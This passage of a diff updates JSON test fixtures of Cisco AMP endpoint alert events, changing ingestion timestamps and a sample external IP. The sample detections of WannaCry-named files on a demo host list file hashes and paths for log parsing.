"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461510700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -864,7 +864,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -905,7 +905,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -915,8 +915,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103737757Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461515400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -936,7 +936,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -977,7 +977,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -987,8 +987,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103739790Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461521100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -1008,7 +1008,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1054,7 +1054,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1071,8 +1071,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103741830Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461526200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1094,7 +1094,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1153,7 +1153,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1170,8 +1170,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103743884Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", + "ingested": "2021-12-09T13:35:51.461531900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1193,7 +1193,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1254,7 +1254,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1271,8 +1271,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103745931Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:51.461537700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1294,7 +1294,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1353,7 +1353,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1370,8 +1370,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103748099Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:51.461543700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1393,7 +1393,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1456,7 +1456,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1473,8 +1473,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103750142Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:51.461549500Z", + "original": 